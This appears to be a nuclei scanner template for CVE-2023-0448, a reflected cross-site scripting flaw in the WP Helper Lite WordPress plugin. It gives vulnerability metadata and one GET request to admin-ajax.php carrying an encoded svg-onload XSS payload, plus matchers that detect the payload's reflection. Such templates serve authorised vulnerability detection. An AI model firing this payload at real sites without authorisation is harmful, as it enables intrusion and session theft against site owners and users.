nuclei-templates/http/cves/2023/CVE-2023-0448.yaml

45 lines
1.8 KiB
YAML

id: CVE-2023-0448
info:
name: WP Helper Lite < 4.3 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: Fixed in version 4.3 and above
reference:
- https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256
- https://nvd.nist.gov/vuln/detail/CVE-2023-0448
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0448
cwe-id: CWE-79
epss-score: 0.00078
epss-percentile: 0.32657
cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: matbao
product: wp_helper_premium
framework: wordpress
publicwww-query: "/wp-content/plugins/wp-helper-lite"
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "><svg onload=alert(document.domain)>")'
- 'contains(body, "params\":{\"action")'
condition: and
# digest: 4a0a0047304502203284fa2cd4c61cd46c8ec4611d74232f7b04c464e0e99ba5bf7aa071e2f14ed1022100c373dec5f126a4152956472ee5cb773bed0a9846dc99b5d804ad582758b98a7c:922c64590222798bb761d5b6d8e72950